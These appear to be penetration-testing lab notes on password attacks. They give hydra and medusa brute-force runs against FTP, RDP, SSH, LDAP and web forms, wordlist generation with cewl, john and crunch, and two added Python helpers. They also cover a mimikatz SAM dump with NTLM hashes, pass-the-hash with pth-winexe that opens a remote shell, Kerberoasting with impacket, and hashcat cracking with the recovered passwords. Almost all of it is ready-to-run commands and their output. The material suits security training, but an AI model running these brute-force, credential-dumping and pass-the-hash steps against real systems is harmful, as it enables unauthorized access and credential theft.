Services supported by hydra (from hydra -h; [s] marks an optional TLS variant, {a|b} alternatives):
asterisk, cisco, cisco-enable, cvs, firebird, ftp[s], http[s]-{head|get|post}, http[s]-{get|post}-form, http-proxy, http-proxy-urlenum, icq, imap[s], irc, ldap2[s], ldap3[-{cram|digest}md5][s], memcached, mongodb, mssql, mysql, nntp, oracle-listener, oracle-sid, pcanywhere, pcnfs, pop3[s], postgres, radmin2, rdp, redis, rexec, rlogin, rpcap, rsh, rtsp, s7-300, smb, smtp[s], smtp-enum, snmp, socks5, ssh, sshkey, teamspeak, vnc
VNC with an explicit port (-s), 4 parallel tasks (-t 4) and verbose output (-V); the vnc module authenticates with a password only, so no -l is needed:
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt -t 4 10.11.1.73 vnc -V
$ hydra -I -t 10 -l bob -P ftp.txt -vV 192.168.119.152 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 16:28:34
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 17 login tries (l:1/p:17), ~2 tries per task
[DATA] attacking ftp://192.168.119.152:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "January" - 1 of 17 [child 0] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "February" - 2 of 17 [child 1] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "March" - 3 of 17 [child 2] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "April" - 4 of 17 [child 3] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "May" - 5 of 17 [child 4] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "June" - 6 of 17 [child 5] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "July" - 7 of 17 [child 6] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "August" - 8 of 17 [child 7] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "September" - 9 of 17 [child 8] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "October" - 10 of 17 [child 9] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "November" - 11 of 17 [child 6] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "December" - 12 of 17 [child 5] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "lab" - 13 of 17 [child 8] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "Offsec!" - 14 of 17 [child 3] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "offsec!" - 15 of 17 [child 2] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "lab" - 16 of 17 [child 9] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "bob" - 17 of 17 [child 4] (0/0)
[STATUS] attack finished for 192.168.119.152 (waiting for children to complete tests)
[21][ftp] host: 192.168.119.152 login: bob password: bob
HTTP POST form. The module argument is path:POST body:failure string. ^PASS^ (and ^USER^) are substituted on every attempt, and the failure string must be text that only appears in the response to a bad login; -f stops at the first valid pair:
hydra 192.168.152.10 http-form-post \
"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" \
-l admin -P /usr/share/wordlists/rockyou.txt -vV -f
LDAP with a user list; -u loops over all users for each password before moving to the next password (spreads attempts across accounts and lowers the lockout risk), -t 1 keeps it to a single task:
hydra -u -L users.txt -P pw.txt 10.11.1.20 ldap2 -t 1
[kali@kali:~/lab/19_password_cracking]$ hydra -t1 -V -f -l admin -P rdp.txt rdp://192.168.152.10
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 15:51:20
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 15 login tries (l:1/p:15), ~15 tries per task
[DATA] attacking rdp://192.168.152.10:3389/
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "January" - 1 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "February" - 2 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "March" - 3 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "April" - 4 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "May" - 5 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "June" - 6 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "July" - 7 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "August" - 8 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "September" - 9 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "October" - 10 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "November" - 11 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "December" - 12 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "lab" - 13 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "Offsec!" - 14 of 15 [child 0] (0/0)
[3389][rdp] host: 192.168.152.10 login: admin password: Offsec!
[STATUS] attack finished for 192.168.152.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-10 15:51:24
[kali@kali:~/lab/19_password_cracking]$ hydra -l student -P ssh.txt ssh://192.168.152.44
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 15:52:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:1/p:16), ~1 try per task
[DATA] attacking ssh://192.168.152.44:22/
[22][ssh] host: 192.168.152.44 login: student password: lab
[22][ssh] host: 192.168.152.44 login: student password: lab
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-10 15:52:58
[kali@kali:~/lab/19_password_cracking]$
Medusa is a speedy, parallel, modular login brute-forcer.
Supported modules:
$ medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
Available modules in "." :
Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
In this example we crack the password of user "admin" for http://192.168.152.10/admin, a directory protected by .htaccess (HTTP basic auth); -M http selects the module and -m DIR:/admin passes it the protected path:
medusa -h 192.168.152.10 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
Crack the SMB password for user "offsec" with the word list smb.txt (the smbnt module handles LM/NTLM/NTLMv2):
medusa -h 192.168.152.10 -u offsec -P smb.txt -M smbnt
Use cewl to build a wordlist from a website (-m 6 keeps only words of at least six characters, -w writes the list to a file):
cewl https://brakertech.com -m 6 -w brakertech-cewl.txt
Let's add two custom rules. The first appends a single digit 0-9 to each word; the second appends two digits (00-99). In john's rule syntax $X appends a character and [..] is a preprocessor class that expands to one rule per character, so the first line is really ten rules and the second a hundred.
# append to the end of the [List.Rules:Wordlist] section of /etc/john/john.conf
# Add one number to the end of each password
$[0-9]
# Add two numbers to the end of each password
$[0-9]$[0-9]
[kali@kali:~/lab/19_password_cracking]$ grep -A 1 "end of each" /etc/john/john.conf
# Add one number to the end of each password
$[0-9]
# Add two numbers to the end of each password
$[0-9]$[0-9]
Mutate cewl list
john --wordlist=brakertech-cewl.txt --rules --stdout > mutated.txt
Months text file:
[kali@kali:~/lab/19_password_cracking]$ cat months.txt
January
February
March
April
May
June
July
August
September
October
November
December
Mutate it:
john --wordlist=months.txt --rules --stdout > months-mutated.txt; sort -u months-mutated.txt > months-mutated-uniq.txt
List the number of lines:
[kali@kali:~/lab/19_password_cracking]$ wc -l < months-mutated-uniq.txt
1799
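As an added example (not part of the original notes and not john's code), the following reimplements the two custom rules above for the months list, so you can see exactly what $[0-9] and $[0-9]$[0-9] expand to. It handles only the $X/^X append and prepend commands and the [..] preprocessor classes, so it yields 1320 candidates for the twelve months; the 1799 counted above also includes john's stock [List.Rules:Wordlist] rules.

```python
"""Tiny emulation of the john rule subset used in these notes (added example)."""
from itertools import product

# the months.txt list from the notes
MONTHS = ["January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December"]


def expand_class(spec):
    """Expand a john preprocessor class such as '[0-9]' or '[!?]' into its characters."""
    if not spec.startswith("["):
        return [spec]
    body, chars, i = spec[1:-1], [], 0
    while i < len(body):
        if i + 2 < len(body) and body[i + 1] == "-":          # range like 0-9
            chars.extend(chr(c) for c in range(ord(body[i]), ord(body[i + 2]) + 1))
            i += 3
        else:                                                  # single character
            chars.append(body[i])
            i += 1
    return chars


def parse_rule(rule):
    """Split '$[0-9]$[0-9]' into (command, candidate characters) pairs."""
    ops, i = [], 0
    while i < len(rule):
        cmd = rule[i]
        if cmd not in "$^":
            raise ValueError("unsupported rule command: %r" % cmd)
        if rule[i + 1] == "[":
            end = rule.index("]", i + 1)
            ops.append((cmd, expand_class(rule[i + 1:end + 1])))
            i = end + 1
        else:
            ops.append((cmd, [rule[i + 1]]))
            i += 2
    return ops


def apply_rule(rule, word):
    """Yield every mutation of word that the (preprocessor-expanded) rule produces."""
    ops = parse_rule(rule)
    for choice in product(*[chars for _, chars in ops]):
        out = word
        for (cmd, _), ch in zip(ops, choice):
            out = out + ch if cmd == "$" else ch + out         # $ appends, ^ prepends
        yield out


def mutate(words, rules):
    """Apply each rule to each word, deduplicating like the sort -u step in the notes."""
    seen, result = set(), []
    for rule in rules:
        for w in words:
            for cand in apply_rule(rule, w):
                if cand not in seen:
                    seen.add(cand)
                    result.append(cand)
    return result


if __name__ == "__main__":
    for cand in mutate(MONTHS, ["$[0-9]", "$[0-9]$[0-9]"]):
        print(cand)
```

Run it and pipe the output into hydra or hashcat the same way the john --stdout list is used above; extending it to more of john's rule language (case toggles, truncation) is straightforward once the preprocessor expansion is in place.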
Assume the following pattern:
[Capital Letter] [2 x lower case letters] [2 x special chars] [3 x numeric]
To generate a wordlist that matches our requirements, we specify a minimum and maximum word length of eight characters (8 8) and describe the pattern with -t, where , is an upper-case letter, @ a lower-case letter, ^ a special character and % a digit:
crunch 8 8 -t ,@@^^%%%
Crunch character sets can be found at:
/usr/share/crunch/charset.lst
To generate a list of words between 4 and 6 characters that mixes upper and lower case:
kali@kali:~$ crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt
Crunch will now generate the following amount of data: 140712049920 bytes
134193 MB
131 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 20158125312
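Added example (not crunch's or hashcat's code): an estimator that reproduces the line and byte counts crunch prints above and extends them to -t patterns and hashcat masks, including --increment, so a pattern can be sized before 131 GB lands on disk (or before deciding to pipe crunch straight into hashcat instead). The 33-character special set assumed for the ^ placeholder is an assumption that matches hashcat's ?s; the other set sizes are the standard ones.

```python
"""Keyspace and output-size estimator for crunch patterns and hashcat masks (added example)."""
from math import prod

# crunch -t placeholders: , upper, @ lower, % digit, ^ special (33 assumed, same as hashcat ?s)
CRUNCH_PLACEHOLDERS = {",": 26, "@": 26, "%": 10, "^": 33}
# hashcat built-in mask classes
HASHCAT_CLASSES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "h": 16, "H": 16}
# named sets from /usr/share/crunch/charset.lst used with -f
CRUNCH_CHARSETS = {"numeric": 10, "lalpha": 26, "ualpha": 26,
                   "mixalpha": 52, "mixalpha-numeric": 62}


def crunch_charset_space(min_len, max_len, charset):
    """Lines and bytes for `crunch MIN MAX -f charset.lst NAME` (one newline per word)."""
    size = CRUNCH_CHARSETS[charset]
    lengths = range(min_len, max_len + 1)
    lines = sum(size ** n for n in lengths)
    nbytes = sum(size ** n * (n + 1) for n in lengths)
    return lines, nbytes


def human_sizes(nbytes):
    """(MB, GB, TB, PB) rounded down, the way crunch reports them."""
    return tuple(nbytes // 1024 ** p for p in (2, 3, 4, 5))


def crunch_pattern_space(pattern):
    """Candidates for `crunch N N -t PATTERN`; literal characters contribute a factor of 1."""
    return prod(CRUNCH_PLACEHOLDERS.get(ch, 1) for ch in pattern)


def parse_mask(mask):
    """Turn a hashcat mask like '?l?l?d' into per-position set sizes (literals are 1)."""
    sizes, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            sizes.append(1 if mask[i + 1] == "?" else HASHCAT_CLASSES[mask[i + 1]])
            i += 2                                  # '??' is a literal question mark
        else:
            sizes.append(1)
            i += 1
    return sizes


def mask_space(mask, increment=False, increment_min=1):
    """Candidates for `hashcat -a 3 MASK`; with --increment every prefix length is tried too."""
    sizes = parse_mask(mask)
    if not increment:
        return prod(sizes)
    return sum(prod(sizes[:n]) for n in range(increment_min, len(sizes) + 1))


if __name__ == "__main__":
    lines, nbytes = crunch_charset_space(4, 6, "mixalpha")
    print("crunch 4 6 mixalpha:", lines, "lines,", nbytes, "bytes", human_sizes(nbytes))
    print("crunch 8 8 -t ,@@^^%%%:", crunch_pattern_space(",@@^^%%%"))
    print("?l?l?l?l?d?d:", mask_space("?l?l?l?l?d?d"),
          "with --increment:", mask_space("?l?l?l?l?d?d", increment=True))
```

The mixalpha figures come out exactly as crunch printed them, which is a useful sanity check before trusting the estimator on a pattern that has not been run yet.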
Pass the hash: the NTLM hash of an account can be used directly to authenticate to systems that accept NTLM, so the password does not need to be cracked at all. Dump the local SAM with mimikatz (needs SeDebugPrivilege and a SYSTEM token):
C:\Tools\password_attacks>mimikatz.exe
.#####. mimikatz 2.1.1 (x86) built on Mar 25 2018 21:00:57
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
528 {0;000003e7} 1 D 29162 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000f3d23} 3 D 1256857 CLIENT251\Administrator S-1-5-21-1375711201-1277040102-1320212398-500
(14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 1309568 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : CLIENT251
SysKey : 34d76d5474939d8e4eff07823e7691d1
Local SID : S-1-5-21-1375711201-1277040102-1320212398
SAMKey : 0dd784cbffd297eef0b42b099eefe68f
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 32251211a407adf98000769dc64e3323
RID : 000003e9 (1001)
User : admin
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
lm - 0: 30d17563f7974c31af287e692700eb2f
lm - 1: b561d600bb224c9ad172dfc2a05c9457
ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
ntlm- 1: f5e4cc1e05fcef8d9e751195562308d9
ntlm- 2: 2892d26cdf84d7a70e2eb3b9f05c425e
RID : 000003ea (1002)
User : student
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
lm - 0: 782f5478a22d80fe0d941f7c53d6beca
ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
ntlm- 1: 2892d26cdf84d7a70e2eb3b9f05c425e
RID : 000003eb (1003)
User : offsec
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
lm - 0: 61fc5cc76eab45fcf27f8b0c01386132
ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
mimikatz #
Use pth-winexe to authenticate to the target machine with the hash. The -U argument takes user%LMHASH:NTHASH; when no LM hash was recovered (as in the dump above, which only lists NTLM hashes), the NT hash is supplied in both positions, as in the example below.
pth-winexe -U username%LMHASH:NTHASH //ip_address cmd
[kali@kali:~/lab/19.4.3_PasswordCracking]$ cat hash.txt
admin:2892d26cdf84d7a70e2eb3b9f05c425e
WDAGUtilityAccount:32251211a407adf98000769dc64e3323
[kali@kali:~]$ pth-winexe -U admin%2892d26cdf84d7a70e2eb3b9f05c425e:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.152.10 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
In order to crack Linux passwords you first combine /etc/passwd and /etc/shadow with the unshadow utility (user names come from passwd, hashes from shadow; both files are needed):
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
hashcat mode 1800 is sha512crypt ($6$), the default on most current Linux systems:
hashcat -m 1800 -a 0 mailman.txt /Passwords/wordlists/* --outfile mailman.recovered
Kerberoast: request TGS tickets for every account with an SPN (impacket), then crack the RC4 (etype 23) tickets with mode 13100:
python3 /pentest/exploitation/impacket/examples/GetUserSPNs.py -request -dc-ip 10.11.1.20 svcorp.com/evan
hashcat -a 0 -m 13100 svcorp-kerb.txt /Passwords/wordlists/rockyou.txt
$ cat hash.txt
admin:2892d26cdf84d7a70e2eb3b9f05c425e
WDAGUtilityAccount:32251211a407adf98000769dc64e3323
$ sudo john hash.txt --format=NT
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
Example hash (md5crypt, $1$, as it appears in unshadow output); hashcat mode 500:
bob:$1$2Wf/hKQd$tV9MM3Qd0Y88GvsDfVvHL0:500:500::/home/bob:/bin/bash
hashcat -m 500 -a 0 tophat.txt /Passwords/wordlists/rockyou.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
python kirbi2john.py /home/kali/ktickets/[email protected]~1433.kirbi
Crack it with john (the format is detected from the $krb5 prefix):
# john crack_file --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a8c8b7a37513b7eb9308952b814b522b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:05fa67eaec4d789ec4bd52f48e5a6b28:2733cdb0d8a1fec3f976f3b8ad1deeef:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0f7a50dd4b95cec4c1dea566f820f4e7:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:b74242f37e47371aff835a6ebcac4ffe:::
kali:1007:aad3b435b51404eeaad3b435b51404ee:fe0bd4e2285afa2676815126dee2f671:::
NTLM is hashcat mode 1000. --force suppresses hashcat's warnings (unsupported OpenCL runtime and the like) and is only acceptable in a GPU-less VM; --username tells hashcat the file is user:hash, and --show prints the pairs already cracked into the potfile:
hashcat --force -m 1000 ntlm.txt /Passwords/wordlists/rockyou.txt
hashcat --force -m 1000 -r /usr/share/hashcat/rules/best64.rule ntlm.txt /Passwords/wordlists/rockyou.txt --outfile alice.recovered
hashcat --username --show -m 1000 -a 0 disco.txt /Passwords/wordlists/rockyou.txt --outfile disco.recovered
kali:fe0bd4e2285afa2676815126dee2f671:kalikali
Guest:31d6cfe0d16ae931b73c59d7e0c089c0:
tood:9a82672679eba04f060863e3dcff7ec7:SPRINGFIELD
mark:bcd477bfdb45435a34c6a38403ca4364:1985
lisa:9c1a294eacb2256b85d8aaba29cfa8f8:BART
ned:40506e34f25e9a8e63ebb95a71afa46a:FLANDERS
david:1fbff38cae51e9918da1fec572f03e11:012345
lee:fc12c395f8f4f7b164b874b9a295f18e:CHEESE
alice:37bcb18eea49b1c09efcfdd9909fcb3a:QWERTY
john:c420ab2599dff2c51e5086c05feb710b:PASSWORD1
homer:8ca881aabea06ef2406acfe38e841b1a:HOMER1
root@crackstation:/labs/alice]# cat alice.recovered
31d6cfe0d16ae931b73c59d7e0c089c0:
fe0bd4e2285afa2676815126dee2f671:kalikali
b74242f37e47371aff835a6ebcac4ffe:aliceishere
Convert kirbi2john output ($krb5tgs$<name>:<data>) to the hashcat 13100 layout ($krb5tgs$23$*<name>*$<data>):
sed -i 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file
hashcat -m 13100 -a 0 crack_file /opt/wordlists/Passwords/*.txt
Mask attack (-a 3) driven by a .hcmask file:
hashcat -m 13100 -a 3 crack_file /opt/hashcat-5.1.0/masks/rockyou-1-60.hcmask
Use the --increment flag to also try every shorter prefix of a mask (from --increment-min, default 1, up to the full mask length):
# Kerberos mode 13100 shown; the same flags apply to any mode
hashcat -m 13100 -a 3 --increment crack_file /opt/hashcat-5.1.0/masks/8char-1l-1u-1d-1s-compliant.hcmask
OK, well, finally understood: hashcat can crack only hashes and not usernames or passwords. At least let me know how I apply PIPE on hydra.